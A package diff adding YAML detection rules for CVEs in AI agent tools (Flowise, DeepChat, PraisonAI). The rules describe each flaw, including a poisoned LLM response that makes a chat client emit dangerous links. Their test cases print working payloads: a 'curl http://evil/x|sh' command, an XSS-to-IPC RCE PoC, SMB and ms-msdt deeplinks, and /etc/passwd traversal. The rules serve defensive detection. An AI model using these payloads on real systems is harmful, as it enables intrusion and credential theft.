agent-threat-rules 3.5.3 → 3.5.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +1 -1
- package/package.json +2 -2
- package/rules/context-exfiltration/ATR-2026-01948-netlicensing-mcp-product-number-path-traversal-token-leak.yaml +132 -0
- package/rules/context-exfiltration/ATR-2026-01957-m365-copilot-searchleak-open-redirect-exfil.yaml +95 -0
- package/rules/context-exfiltration/ATR-2026-01961-meta-ads-mcp-unauth-token-leak.yaml +135 -0
- package/rules/context-exfiltration/ATR-2026-01964-langchain-gmailtoolkit-indirect-prompt-injection-email-exfil.yaml +99 -0
- package/rules/privilege-escalation/ATR-2026-01949-praisonai-mcpserver-unauth-tools-call.yaml +138 -0
- package/rules/privilege-escalation/ATR-2026-01974-anything-llm-data-import-access-control.yaml +93 -0
- package/rules/tool-poisoning/ATR-2026-01952-praisonai-codemode-sandbox-escape-rce.yaml +125 -0
- package/rules/tool-poisoning/ATR-2026-01953-praisonai-codemode-function-ctor-sandbox-escape.yaml +111 -0
- package/rules/tool-poisoning/ATR-2026-01959-openhuman-shell-allowlist-env-prefix-bypass.yaml +136 -0
- package/rules/tool-poisoning/ATR-2026-01963-praisonai-action-orchestrator-step-target-path-traversal-rce.yaml +99 -0
- package/rules/tool-poisoning/ATR-2026-01965-flowise-custommcp-os-command-rce.yaml +137 -0
- package/rules/tool-poisoning/ATR-2026-01967-deepchat-mermaid-xss-rce-ipc-mcp-register.yaml +97 -0
- package/rules/tool-poisoning/ATR-2026-01968-deepchat-markdown-deeplink-openexternal-rce-bypass.yaml +149 -0
- package/rules/tool-poisoning/ATR-2026-01970-praisonai-filetools-normpath-path-traversal.yaml +111 -0
- package/rules/tool-poisoning/ATR-2026-01973-anythingllm-logo-endpoint-path-traversal.yaml +95 -0
- package/rules/tool-poisoning/ATR-2026-01978-anythingllm-collector-process-filename-path-traversal-delete.yaml +95 -0
- package/rules/tool-poisoning/ATR-2026-01979-pandasai-prompt-injection-dunder-sandbox-escape-rce.yaml +105 -0
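--- a/package/rules/tool-poisoning/ATR-2026-01965-flowise-custommcp-os-command-rce.yaml
+++ b/package/rules/tool-poisoning/ATR-2026-01965-flowise-custommcp-os-command-rce.yaml
@@ -0,0 +1,137 @@
+title: "Flowise Custom MCP node-load-method OS Command RCE (CVE-2025-8943)"
+id: ATR-2026-01965
+rule_version: 1
+status: draft
+description: >
+Detects CVE-2025-8943 (CVSS 9.8 CRITICAL, CWE-78): Flowise < 3.0.1 exposes the
+Custom MCP feature via the POST /api/v1/node-load-method/customMCP endpoint,
+which passes inputs.mcpServerConfig.command + args directly into StdioClientTransport
+(unsandboxed OS exec). With loadMethod set to "listActions" and no FLOWISE_USERNAME/
+PASSWORD configured, an attacker reaches RCE unauthenticated using the
+x-request-from: internal header. This rule keys on the specific endpoint path, the
+mcpServerConfig+loadMethod:listActions exploit triple, and the internal-header auth
+bypass — NOT on generic command/args MCP config which is benign and ubiquitous.
+author: "ATR Community"
+date: "2026/06/29"
+schema_version: "0.1"
+detection_tier: pattern
+maturity: test
+severity: critical
+references:
+owasp_llm:
+- "LLM06:2025 - Excessive Agency"
+owasp_agentic:
+- "ASI06:2026 - Tool Misuse"
+mitre_atlas:
+- "AML.T0049 - Exploit Public-Facing Application"
+mitre_attack:
+- "T1190 - Exploit Public-Facing Application"
+cve:
+- "CVE-2025-8943"
+metadata_provenance:
+mitre_atlas: human-reviewed
+owasp_llm: human-reviewed
+owasp_agentic: human-reviewed
+compliance:
+eu_ai_act:
+- article: "15"
+context: "Article 15 (accuracy, robustness, cybersecurity) — runtime detection of this technique is a cybersecurity control for high-risk AI systems. Technique: Flowise Custom MCP node-load-method OS Command RCE (CVE-2025-8943)."
+strength: primary
+- article: "9"
+context: "Article 9 (risk management system) requires identified risks to be addressed by appropriate measures; this rule is a runtime risk-treatment control. Technique: Flowise Custom MCP node-load-method OS Command RCE (CVE-2025-8943)."
+strength: secondary
+nist_ai_rmf:
+- subcategory: "MP.5.1"
+context: "NIST AI RMF MAP 5.1 — likelihood and impact of the identified attack are characterised; this rule detects the adversarial input at runtime. Technique: Flowise Custom MCP node-load-method OS Command RCE (CVE-2025-8943)."
+strength: primary
+- subcategory: "MG.3.2"
+context: "NIST AI RMF MANAGE 3.2 — runtime monitoring/maintenance control that surfaces this attack class. Technique: Flowise Custom MCP node-load-method OS Command RCE (CVE-2025-8943)."
+strength: secondary
+iso_42001:
+- clause: "8.1"
+context: "ISO/IEC 42001 Clause 8.1 (operational planning and control) — detection of this payload is an operational control. Technique: Flowise Custom MCP node-load-method OS Command RCE (CVE-2025-8943)."
+strength: primary
+- clause: "8.3"
+context: "ISO/IEC 42001 Clause 8.3 (AI risk treatment) — this rule implements runtime detection as a treatment control. Technique: Flowise Custom MCP node-load-method OS Command RCE (CVE-2025-8943)."
+strength: secondary
+tags:
+category: tool-poisoning
+subcategory: flowise-custommcp-os-command-rce
+scan_target: both
+confidence: high
+source: cve-disclosure
+vendor_sources: flowise-cve-2025-8943
+agent_source:
+type: llm_io
+framework:
+- any
+provider:
+- any
+detection:
+condition: any
+false_positives:
+- "Legitimate Flowise Custom MCP node configuring a real local MCP server (e.g. command npx, args @modelcontextprotocol/server-filesystem) without the listActions loadMethod probe shape."
+- "Generic MCP server JSON config containing command/args keys, which is standard and benign across thousands of MCP clients."
+- "Flowise documentation or patch advisory referencing the node-load-method endpoint without an exploit payload or the internal auth-bypass header."
+conditions:
+- field: content
+operator: regex
+value: '(?i)node-load-method/customMCP[\s\S]{0,400}mcpServerConfig[\s\S]{0,400}["\x27]?loadMethod["\x27]?\s*[:=]\s*["\x27]listActions["\x27]'
+description: >
+Flowise customMCP node-load-method endpoint combined with the
+mcpServerConfig payload and loadMethod:listActions probe — the exact
+CVE-2025-8943 RCE request shape
+- field: content
+operator: regex
+value: '(?i)mcpServerConfig["\x27]?\s*:\s*\{[\s\S]{0,200}["\x27]command["\x27]?\s*:[\s\S]{0,300}["\x27]?loadMethod["\x27]?\s*:\s*["\x27]listActions["\x27]'
+description: >
+inputs.mcpServerConfig.command JSON body paired with loadMethod
+listActions — the Custom MCP command-exec trigger used in the PoC
+- field: content
+operator: regex
+value: '(?i)x-request-from\s*:\s*internal[\s\S]{0,300}(?:node-load-method/customMCP|mcpServerConfig)'
+description: >
+x-request-from: internal auth-bypass header combined with the customMCP
+endpoint or mcpServerConfig — unauthenticated RCE path for default installs
+- field: content
+operator: regex
+value: '(?i)CVE-2025-8943[\s\S]{0,200}(?:customMCP|mcpServerConfig|node-load-method|StdioClientTransport|listActions)'
+description: "explicit CVE framing tied to the Flowise customMCP sink"
+response:
+actions:
+- alert
+- block_input
+message_template: >
+[ATR-2026-01965] CRITICAL: Flowise Custom MCP RCE (CVE-2025-8943, CVSS 9.8) —
+node-load-method/customMCP runs mcpServerConfig.command/args via
+StdioClientTransport, reachable unauthenticated with x-request-from: internal.
+Block this input and upgrade Flowise to >= 3.0.1 (flowise-components >= 3.0.8).
+confidence: 85
+wild_fp_rate: 0
+test_cases:
+true_positives:
+- input: 'POST /api/v1/node-load-method/customMCP {"inputs":{"mcpServerConfig":{"command":"touch","args":["/tmp/yofitofi"]}},"loadMethod":"listActions"}'
+expected: triggered
+description: "Exact JFrog PoC: customMCP endpoint + mcpServerConfig command/args + loadMethod listActions"
+- input: '{"inputs": {"mcpServerConfig": {"command": "bash", "args": ["-c", "curl http://evil/x|sh"]}}, "loadMethod": "listActions"}'
+expected: triggered
+description: "mcpServerConfig.command bash reverse-shell payload with the listActions trigger"
+- input: 'curl -H "x-request-from: internal" http://target:3000/api/v1/node-load-method/customMCP -d @payload --mcpServerConfig command'
+expected: triggered
+description: "Unauthenticated exploit using x-request-from internal header against the customMCP endpoint"
+- input: "CVE-2025-8943 Flowise RCE: send mcpServerConfig command/args to node-load-method/customMCP with loadMethod listActions"
+expected: triggered
+description: "Attack-framing text tying CVE-2025-8943 to the customMCP sink"
+true_negatives:
+- input: '{"command": "npx", "args": ["-y", "@modelcontextprotocol/server-filesystem", "/data"]}'
+expected: not_triggered
+description: "Standard benign MCP server config with command/args but no Flowise endpoint, mcpServerConfig, or listActions"
+- input: 'In Flowise, the node-load-method endpoint loads available node parameters when you open a node in the canvas editor.'
+expected: not_triggered
+description: "Benign mention of the node-load-method endpoint with no mcpServerConfig payload or loadMethod listActions"
+- input: '{"mcpServerConfig": {"command": "npx", "args": ["@my-org/mcp-server"]}, "loadMethod": "loadConfig"}'
+expected: not_triggered
+description: "Real Custom MCP config wiring a legitimate server — loadMethod is not the listActions probe used by the exploit"
+- input: "Upgrade Flowise to 3.0.1 to patch CVE-2025-8943; the fix adds authentication to the Custom MCP node."
+expected: not_triggered
+description: "Mitigation advisory referencing the CVE without any exploit payload or auth-bypass header"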
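--- a/package/rules/tool-poisoning/ATR-2026-01967-deepchat-mermaid-xss-rce-ipc-mcp-register.yaml
+++ b/package/rules/tool-poisoning/ATR-2026-01967-deepchat-mermaid-xss-rce-ipc-mcp-register.yaml
@@ -0,0 +1,97 @@
+title: "DeepChat Mermaid XSS to RCE via Electron IPC MCP Server Registration (CVE-2025-66481 / GHSA-h9f5-7hhf-fqm4)"
+id: ATR-2026-01967
+rule_version: 1
+status: draft
+description: >
+Detects CVE-2025-66481 (CVSS 9.6 CRITICAL): DeepChat <= 0.5.1 incompletely
+sanitizes Mermaid diagram content in MermaidArtifact.vue. The sanitizer regex
+/on\w+\s*=\s*["'][^"']*["']/ only strips QUOTED event-handler attributes, so an
+unquoted handler (e.g. `<audio src=x onerror=...>`) survives and executes in the
+Electron renderer. The PoC handler invokes window.electron.ipcRenderer.invoke
+('presenter:call','mcpPresenter','addMcpServer',...) then 'startServer' to register
+and launch a malicious stdio MCP server (command:'calc.exe'), escalating stored
+XSS to remote code execution. This rule keys on the unquoted-onerror + IPC
+presenter:call mcpPresenter addMcpServer/startServer tokens, not on Mermaid alone.
+author: "ATR Community"
+date: "2026/06/29"
+schema_version: "0.1"
+detection_tier: pattern
+maturity: test
+severity: critical
+references:
+owasp_llm: ["LLM06:2025 - Excessive Agency"]
+owasp_agentic: ["ASI06:2026 - Tool Misuse"]
+mitre_atlas: ["AML.T0049 - Exploit Public-Facing Application"]
+mitre_attack: ["T1190 - Exploit Public-Facing Application"]
+cve: ["CVE-2025-66481"]
+metadata_provenance: { mitre_atlas: human-reviewed, owasp_llm: human-reviewed, owasp_agentic: human-reviewed }
+compliance:
+eu_ai_act:
+- article: "15"
+context: "Article 15 (accuracy, robustness, cybersecurity) — runtime detection of this technique is a cybersecurity control for high-risk AI systems. Technique: DeepChat Mermaid XSS to RCE via Electron IPC MCP Server Registration (CVE-2025-66481 / GHSA-h9f5-7hhf-fqm4)."
+strength: primary
+- article: "9"
+context: "Article 9 (risk management system) requires identified risks to be addressed by appropriate measures; this rule is a runtime risk-treatment control. Technique: DeepChat Mermaid XSS to RCE via Electron IPC MCP Server Registration (CVE-2025-66481 / GHSA-h9f5-7hhf-fqm4)."
+strength: secondary
+nist_ai_rmf:
+- subcategory: "MP.5.1"
+context: "NIST AI RMF MAP 5.1 — likelihood and impact of the identified attack are characterised; this rule detects the adversarial input at runtime. Technique: DeepChat Mermaid XSS to RCE via Electron IPC MCP Server Registration (CVE-2025-66481 / GHSA-h9f5-7hhf-fqm4)."
+strength: primary
+- subcategory: "MG.3.2"
+context: "NIST AI RMF MANAGE 3.2 — runtime monitoring/maintenance control that surfaces this attack class. Technique: DeepChat Mermaid XSS to RCE via Electron IPC MCP Server Registration (CVE-2025-66481 / GHSA-h9f5-7hhf-fqm4)."
+strength: secondary
+iso_42001:
+- clause: "8.1"
+context: "ISO/IEC 42001 Clause 8.1 (operational planning and control) — detection of this payload is an operational control. Technique: DeepChat Mermaid XSS to RCE via Electron IPC MCP Server Registration (CVE-2025-66481 / GHSA-h9f5-7hhf-fqm4)."
+strength: primary
+- clause: "8.3"
+context: "ISO/IEC 42001 Clause 8.3 (AI risk treatment) — this rule implements runtime detection as a treatment control. Technique: DeepChat Mermaid XSS to RCE via Electron IPC MCP Server Registration (CVE-2025-66481 / GHSA-h9f5-7hhf-fqm4)."
+strength: secondary
+tags: { category: tool-poisoning, subcategory: mermaid-xss-ipc-rce, scan_target: both, confidence: high, source: cve-disclosure, vendor_sources: deepchat-cve-2025-66481 }
+agent_source: { type: llm_io, framework: [any], provider: [any] }
+detection:
+condition: any
+false_positives:
+- "A legitimate Mermaid diagram (graph/flowchart/sequenceDiagram) with node labels and no event-handler attributes or IPC calls."
+- "DeepChat source/docs discussing the electron.ipcRenderer presenter bridge or mcpPresenter API without an embedded onerror handler payload."
+- "A normal addMcpServer config object with command:'npx' that is not wrapped inside an HTML event handler attribute."
+conditions:
+- field: content
+operator: regex
+value: '(?i)<\s*(?:audio|img|video|svg|image|object|input|body|details)\b[^>]*\bon\w+\s*=\s*[^"''\s>][^>]*?(?:electron\.)?ipcRenderer\.invoke\s*\(\s*[''"]presenter:call[''"]'
+description: "one line: HTML tag with an UNQUOTED event handler whose body calls ipcRenderer.invoke('presenter:call' — the CVE-2025-66481 sanitizer-bypass + IPC sink"
+- field: content
+operator: regex
+value: '(?i)ipcRenderer\.invoke\([^)]*[''"]mcpPresenter[''"][^)]*[''"](?:addMcpServer|startServer)[''"]'
+description: "one line: Electron IPC presenter:call into mcpPresenter registering/starting an MCP server — the RCE escalation primitive"
+- field: content
+operator: regex
+value: '(?i)CVE-2025-66481[\s\S]{0,200}(?:mermaid|MermaidArtifact|onerror|ipcRenderer|mcpPresenter)'
+description: "explicit CVE framing"
+response:
+actions: [alert, block_input]
+message_template: >
+[ATR-2026-01967] CRITICAL: DeepChat Mermaid XSS bypass (CVE-2025-66481) escalates to RCE by registering a malicious MCP server via electron ipcRenderer. Block and upgrade past 0.5.1.
+confidence: 85
+wild_fp_rate: 0
+test_cases:
+true_positives:
+- input: "<audio src=x onerror=window.electron.ipcRenderer.invoke('presenter:call','mcpPresenter','addMcpServer','test',{command:'calc.exe',args:[],type:'stdio',enabled:true,name:'test'}).then(()=>window.electron.ipcRenderer.invoke('presenter:call','mcpPresenter','startServer','test'))>"
+expected: triggered
+description: "Exact CVE-2025-66481 PoC: unquoted onerror on <audio> survives the sanitizer and invokes mcpPresenter addMcpServer/startServer for RCE"
+- input: "graph TD; A[<img src=x onerror=electron.ipcRenderer.invoke('presenter:call','mcpPresenter','addMcpServer','x',{command:'powershell',args:[],type:'stdio'})>]"
+expected: triggered
+description: "Same bypass inside a Mermaid node label using <img> unquoted onerror into the mcpPresenter IPC sink"
+- input: "window.electron.ipcRenderer.invoke('presenter:call','mcpPresenter','startServer','test')"
+expected: triggered
+description: "The IPC escalation primitive that launches the attacker-registered MCP server"
+true_negatives:
+- input: "graph TD; A[Start] --> B[Process] --> C[End]"
+expected: not_triggered
+description: "Benign Mermaid flowchart with plain node labels, no event handler or IPC call"
+- input: "DeepChat uses electron.ipcRenderer for its presenter bridge; see mcpPresenter docs for how addMcpServer registers a server."
+expected: not_triggered
+description: "Documentation mentioning the presenter/mcpPresenter API without an unquoted onerror handler or the invoke() call shape"
+- input: "<img src=\"diagram.png\" onerror=\"showFallback()\" alt=\"architecture\">"
+expected: not_triggered
+description: "Legitimate quoted onerror fallback handler with no ipcRenderer/presenter:call payload"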
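--- a/package/rules/tool-poisoning/ATR-2026-01968-deepchat-markdown-deeplink-openexternal-rce-bypass.yaml
+++ b/package/rules/tool-poisoning/ATR-2026-01968-deepchat-markdown-deeplink-openexternal-rce-bypass.yaml
@@ -0,0 +1,149 @@
+title: "DeepChat Markdown Deeplink shell.openExternal Protocol Bypass RCE (CVE-2026-43899, GHSA-cp8j-jx7q-7r5f)"
+id: ATR-2026-01968
+rule_version: 1
+status: draft
+description: >
+Detects CVE-2026-43899 / GHSA-cp8j-jx7q-7r5f (CRITICAL): incomplete fix of
+CVE-2025-55733 in ThinkInAIXYZ/deepchat (< 1.0.4-beta.1). The native Electron
+window handler in src/main/presenter/tabPresenter.ts calls shell.openExternal(url)
+inside setWindowOpenHandler() without the ALLOWED_PROTOCOLS check that exists in
+the renderer preload, so a Markdown link rendered with target="_blank" reaches
+the OS protocol handler unsanitised. A poisoned LLM API response (e.g. from a
+custom /v1/chat/completions endpoint) returns Markdown such as
+"[click here](calculator://)" or "[open](smb://attacker/share)" to launch
+arbitrary protocol handlers (calculator://, smb://, ms-msdt://, bash://,
+file://) for host-level code execution and NTLM credential theft over SMB.
+author: "ATR Community"
+date: "2026/06/29"
+schema_version: "0.1"
+detection_tier: pattern
+maturity: test
+severity: critical
+references:
+owasp_llm:
+- "LLM06:2025 - Excessive Agency"
+- "LLM05:2025 - Improper Output Handling"
+owasp_agentic:
+- "ASI06:2026 - Tool Misuse"
+- "ASI05:2026 - Unexpected Code Execution"
+mitre_atlas:
+- "AML.T0049 - Exploit Public-Facing Application"
+mitre_attack:
+- "T1190 - Exploit Public-Facing Application"
+- "T1204.001 - User Execution: Malicious Link"
+cve:
+- "CVE-2026-43899"
+- "GHSA-cp8j-jx7q-7r5f"
+metadata_provenance:
+mitre_atlas: human-reviewed
+owasp_llm: human-reviewed
+owasp_agentic: human-reviewed
+compliance:
+eu_ai_act:
+- article: "15"
+context: "Article 15 (accuracy, robustness, cybersecurity) — runtime detection of this technique is a cybersecurity control for high-risk AI systems. Technique: DeepChat Markdown Deeplink shell.openExternal Protocol Bypass RCE (CVE-2026-43899, GHSA-cp8j-jx7q-7r5f)."
+strength: primary
+- article: "9"
+context: "Article 9 (risk management system) requires identified risks to be addressed by appropriate measures; this rule is a runtime risk-treatment control. Technique: DeepChat Markdown Deeplink shell.openExternal Protocol Bypass RCE (CVE-2026-43899, GHSA-cp8j-jx7q-7r5f)."
+strength: secondary
+nist_ai_rmf:
+- subcategory: "MP.5.1"
+context: "NIST AI RMF MAP 5.1 — likelihood and impact of the identified attack are characterised; this rule detects the adversarial input at runtime. Technique: DeepChat Markdown Deeplink shell.openExternal Protocol Bypass RCE (CVE-2026-43899, GHSA-cp8j-jx7q-7r5f)."
+strength: primary
+- subcategory: "MG.3.2"
+context: "NIST AI RMF MANAGE 3.2 — runtime monitoring/maintenance control that surfaces this attack class. Technique: DeepChat Markdown Deeplink shell.openExternal Protocol Bypass RCE (CVE-2026-43899, GHSA-cp8j-jx7q-7r5f)."
+strength: secondary
+iso_42001:
+- clause: "8.1"
+context: "ISO/IEC 42001 Clause 8.1 (operational planning and control) — detection of this payload is an operational control. Technique: DeepChat Markdown Deeplink shell.openExternal Protocol Bypass RCE (CVE-2026-43899, GHSA-cp8j-jx7q-7r5f)."
+strength: primary
+- clause: "8.3"
+context: "ISO/IEC 42001 Clause 8.3 (AI risk treatment) — this rule implements runtime detection as a treatment control. Technique: DeepChat Markdown Deeplink shell.openExternal Protocol Bypass RCE (CVE-2026-43899, GHSA-cp8j-jx7q-7r5f)."
+strength: secondary
+tags:
+category: tool-poisoning
+subcategory: markdown-deeplink-protocol-handler-rce
+scan_target: both
+confidence: high
+source: cve-disclosure
+vendor_sources: deepchat-cve-2026-43899
+agent_source:
+type: llm_io
+framework:
+- any
+provider:
+- any
+detection:
+condition: any
+false_positives:
+- "Benign Markdown link to an https:// or http:// web page, e.g. [docs](https://example.com)."
+- "Legitimate [open file](file:///Users/me/report.pdf) link to a local document with no UNC/SMB host."
+- "Mitigation advisory text recommending upgrade to deepchat 1.0.4-beta.1 without a deeplink payload."
+- "Electron docs describing setWindowOpenHandler returning { action: 'deny' } with a proper protocol allowlist."
+conditions:
+- field: content
+operator: regex
+value: '(?i)\]\(\s*(?:calculator|smb|ms-msdt|search-ms|ms-officecmd|bash|sh|cmd|vbscript|jar|tel|telnet)://[^)\s]*\)'
+description: >
+Markdown link whose target is a dangerous OS protocol handler scheme
+(calculator/smb/ms-msdt/bash/etc.) — the CVE-2026-43899 deeplink payload
+shape that bypasses shell.openExternal protocol validation.
+- field: content
+operator: regex
+value: '(?i)\]\(\s*(?:file|smb)://(?://|\\\\|[a-z0-9._-]+/[a-z0-9$._-]+)[^)\s]*\)'
+description: >
+Markdown link to a UNC / SMB share path (file://// , file://host/share,
+smb://host/share) used to trigger NTLM credential leak over SMB.
+- field: content
+operator: regex
+value: '(?i)setWindowOpenHandler\s*\([^)]*\)[\s\S]{0,200}shell\.openExternal\s*\(\s*url'
+description: >
+Vulnerable native sink: setWindowOpenHandler passing the raw url to
+shell.openExternal without an ALLOWED_PROTOCOLS check (tabPresenter.ts).
+- field: content
+operator: regex
+value: '(?i)(?:CVE-2026-43899|GHSA-cp8j-jx7q-7r5f|CVE-2025-55733)[\s\S]{0,200}(?:openExternal|setWindowOpenHandler|protocol\s*bypass|deeplink|calculator://|smb://|ms-msdt)'
+description: "explicit CVE/GHSA framing combined with the bypass sink or deeplink token"
+response:
+actions:
+- alert
+- block_input
+message_template: >
+[ATR-2026-01968] CRITICAL: DeepChat Markdown deeplink protocol-handler RCE
+(CVE-2026-43899 / GHSA-cp8j-jx7q-7r5f). A Markdown link to a dangerous URL
+scheme (calculator://, smb://, ms-msdt://, file:// UNC) reaches
+shell.openExternal via setWindowOpenHandler without protocol validation,
+enabling host-level code execution and NTLM credential theft over SMB.
+Block this content and upgrade deepchat to >= 1.0.4-beta.1.
+confidence: 80
+wild_fp_rate: 0
+test_cases:
+true_positives:
+- input: "Please [click here to open the application](calculator://)."
+expected: triggered
+description: "Exact PoC Markdown deeplink launching the calculator:// protocol handler"
+- input: "Done! [open](smb://attacker.example.com/share/payload) to finish setup."
+expected: triggered
+description: "SMB UNC deeplink for NTLM credential theft via Markdown link"
+- input: "Run this fix [here](ms-msdt://id=PCWDiagnostic) right now."
+expected: triggered
+description: "ms-msdt:// (Follina-style) protocol handler in a Markdown link"
+- input: "webContents.setWindowOpenHandler(({ url }) => { shell.openExternal(url); return { action: 'deny' } })"
+expected: triggered
+description: "Vulnerable tabPresenter.ts sink passing raw url to shell.openExternal"
+- input: "CVE-2026-43899: incomplete CVE-2025-55733 fix lets a deeplink reach shell.openExternal via setWindowOpenHandler"
+expected: triggered
+description: "Explicit CVE framing with the named bypass sink"
+true_negatives:
+- input: "See the [DeepChat docs](https://deepchat.thinkinai.xyz/guide) for setup."
+expected: not_triggered
+description: "Benign https:// Markdown link, not a dangerous protocol handler"
+- input: "Attached: [quarterly report](file:///Users/me/Documents/q3.pdf)"
+expected: not_triggered
+description: "Legitimate local file:// link to a document, no UNC/SMB host"
+- input: "Upgrade DeepChat to 1.0.4-beta.1 to fix CVE-2026-43899."
+expected: not_triggered
+description: "Mitigation advice mentioning the CVE without any deeplink or sink token"
+- input: "We sanitise URLs in setWindowOpenHandler by checking parsed.protocol against ALLOWED_PROTOCOLS before returning { action: 'deny' }."
+expected: not_triggered
+description: "Correct handler with protocol allowlist, no raw url passed to openExternal"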
@@ -0,0 +1,111 @@
|
|
|
1
|
+
title: "PraisonAI FileTools _validate_path normpath Path Traversal (CVE-2026-35615 / GHSA-693f-pf34-72c5)"
|
|
2
|
+
id: ATR-2026-01970
|
|
3
|
+
rule_version: 1
|
|
4
|
+
status: draft
|
|
5
|
+
description: >
|
|
6
|
+
Detects exploitation of CVE-2026-35615 (GHSA-693f-pf34-72c5, CWE-22, CVSS 9.2)
|
|
7
|
+
in PraisonAI < 1.5.113. FileTools._validate_path() calls os.path.normpath()
|
|
8
|
+
FIRST, collapsing '..' sequences, then checks `if '..' in normalized` — a check
|
|
9
|
+
that can never fire, so traversal succeeds. An attacker supplies a path such as
|
|
10
|
+
/tmp/../etc/passwd to read_file / write_file / delete_file and reaches any file
|
|
11
|
+
on the host. This rule keys on the distinctive normpath-then-dotdot-check sink,
|
|
12
|
+
the FileTools operation names with a traversal payload, and the canonical
|
|
13
|
+
/tmp/../etc/passwd PoC.
|
|
14
|
+
author: "ATR Community"
|
|
15
|
+
date: "2026/06/29"
|
|
16
|
+
schema_version: "0.1"
|
|
17
|
+
detection_tier: pattern
|
|
18
|
+
maturity: test
|
|
19
|
+
severity: critical
|
|
20
|
+
references:
|
|
21
|
+
owasp_llm: ["LLM06:2025 - Excessive Agency"]
|
|
22
|
+
owasp_agentic: ["ASI06:2026 - Tool Misuse"]
|
|
23
|
+
mitre_atlas: ["AML.T0049 - Exploit Public-Facing Application"]
|
|
24
|
+
mitre_attack: ["T1190 - Exploit Public-Facing Application"]
|
|
25
|
+
cve: ["CVE-2026-35615"]
|
|
26
|
+
metadata_provenance: { mitre_atlas: human-reviewed, owasp_llm: human-reviewed, owasp_agentic: human-reviewed }
|
|
27
|
+
compliance:
|
|
28
|
+
eu_ai_act:
|
|
29
|
+
- article: "15"
|
|
30
|
+
context: "Article 15 (accuracy, robustness, cybersecurity) — runtime detection of this technique is a cybersecurity control for high-risk AI systems. Technique: PraisonAI FileTools _validate_path normpath Path Traversal (CVE-2026-35615 / GHSA-693f-pf34-72c5)."
|
|
31
|
+
strength: primary
|
|
32
|
+
- article: "9"
|
|
33
|
+
context: "Article 9 (risk management system) requires identified risks to be addressed by appropriate measures; this rule is a runtime risk-treatment control. Technique: PraisonAI FileTools _validate_path normpath Path Traversal (CVE-2026-35615 / GHSA-693f-pf34-72c5)."
|
|
34
|
+
strength: secondary
|
|
35
|
+
nist_ai_rmf:
|
|
36
|
+
- subcategory: "MP.5.1"
|
|
37
|
+
context: "NIST AI RMF MAP 5.1 — likelihood and impact of the identified attack are characterised; this rule detects the adversarial input at runtime. Technique: PraisonAI FileTools _validate_path normpath Path Traversal (CVE-2026-35615 / GHSA-693f-pf34-72c5)."
|
|
38
|
+
strength: primary
|
|
39
|
+
- subcategory: "MG.3.2"
|
|
40
|
+
context: "NIST AI RMF MANAGE 3.2 — runtime monitoring/maintenance control that surfaces this attack class. Technique: PraisonAI FileTools _validate_path normpath Path Traversal (CVE-2026-35615 / GHSA-693f-pf34-72c5)."
|
|
41
|
+
strength: secondary
|
|
42
|
+
iso_42001:
|
|
43
|
+
- clause: "8.1"
|
|
44
|
+
context: "ISO/IEC 42001 Clause 8.1 (operational planning and control) — detection of this payload is an operational control. Technique: PraisonAI FileTools _validate_path normpath Path Traversal (CVE-2026-35615 / GHSA-693f-pf34-72c5)."
|
|
45
|
+
strength: primary
|
|
46
|
+
- clause: "8.3"
|
|
47
|
+
context: "ISO/IEC 42001 Clause 8.3 (AI risk treatment) — this rule implements runtime detection as a treatment control. Technique: PraisonAI FileTools _validate_path normpath Path Traversal (CVE-2026-35615 / GHSA-693f-pf34-72c5)."
|
|
48
|
+
strength: secondary
|
|
49
|
+
tags: { category: tool-poisoning, subcategory: path-traversal, scan_target: both, confidence: high, source: cve-disclosure, vendor_sources: praisonai-cve-2026-35615 }
|
|
50
|
+
agent_source: { type: llm_io, framework: [any], provider: [any] }
|
|
51
|
+
detection:
|
|
52
|
+
condition: any
|
|
53
|
+
false_positives:
|
|
54
|
+
- "Legitimate FileTools.read_file('/workspace/data/report.txt') with an absolute path and no '..' traversal segment."
|
|
55
|
+
- "Security advisory or changelog text that names CVE-2026-35615 but contains no traversal payload."
|
|
56
|
+
- "Discussion of os.path.normpath usage in code review without a '../' traversal sink."
|
|
57
|
+
conditions:
|
|
58
|
+
- field: content
|
|
59
|
+
operator: regex
|
|
60
|
+
value: '(?i)(?:FileTools\.)?(?:read_file|write_file|delete_file|copy_file|move_file|get_file_info|list_files|download_file|_validate_path)\s*\(\s*[''"][^''"\n]{0,80}\.\.[\\/]+[^''"\n]{0,120}(?:etc[\\/]passwd|\.\.[\\/]|[\\/]root[\\/]|id_rsa|shadow)'
|
|
61
|
+
description: >
|
|
62
|
+
PraisonAI FileTools operation invoked with a relative path argument that
|
|
63
|
+
contains a '../' traversal segment reaching a sensitive target — the core
|
|
64
|
+
CVE-2026-35615 exploit shape.
|
|
65
|
+
- field: content
|
|
66
|
+
operator: regex
|
|
67
|
+
value: '(?i)(?:os\.path\.)?normpath\s*\([^)\n]{0,80}\)[\s\S]{0,160}(?:if\s+[''"]\.\.[''"]\s+in\b|[''"]\.\.[''"]\s+in\s+normalized)'
|
|
68
|
+
description: >
|
|
69
|
+
The vulnerable validation order: normpath() called first, then an
|
|
70
|
+
ineffective `'..' in normalized` check — the CVE-2026-35615 logic bug.
|
|
71
|
+
- field: content
|
|
72
|
+
operator: regex
|
|
73
|
+
value: '(?i)[''"/]?(?:tmp[\\/])?\.\.[\\/]+etc[\\/]+passwd'
|
|
74
|
+
description: >
|
|
75
|
+
Canonical /tmp/../etc/passwd traversal PoC string from the advisory.
|
|
76
|
+
- field: content
|
|
77
|
+
operator: regex
|
|
78
|
+
value: '(?i)CVE-2026-35615[\s\S]{0,200}(?:_validate_path|normpath|path\s*traversal|FileTools|\.\.[\\/])'
|
|
79
|
+
description: "explicit CVE framing combined with the vulnerable function or traversal token"
|
|
80
|
+
response:
|
|
81
|
+
actions: [alert, block_input]
|
|
82
|
+
message_template: >
|
|
83
|
+
[ATR-2026-01970] CRITICAL: PraisonAI FileTools path traversal (CVE-2026-35615) —
|
|
84
|
+
normpath-then-dotdot-check lets '../' paths escape the workspace and read/write
|
|
85
|
+
any host file (e.g. /etc/passwd). Block this call and upgrade PraisonAI to >= 1.5.113.
|
|
86
|
+
confidence: 80
|
|
87
|
+
wild_fp_rate: 0
|
|
88
|
+
test_cases:
|
|
89
|
+
true_positives:
|
|
90
|
+
- input: "FileTools.read_file('/tmp/../etc/passwd')"
|
|
91
|
+
expected: triggered
|
|
92
|
+
description: "Canonical advisory PoC — FileTools op with traversal to /etc/passwd"
|
|
93
|
+
- input: "result = _validate_path('/tmp/../../../root/.ssh/id_rsa')"
|
|
94
|
+
expected: triggered
|
|
95
|
+
description: "_validate_path called with multi-level traversal to a secret file"
|
|
96
|
+
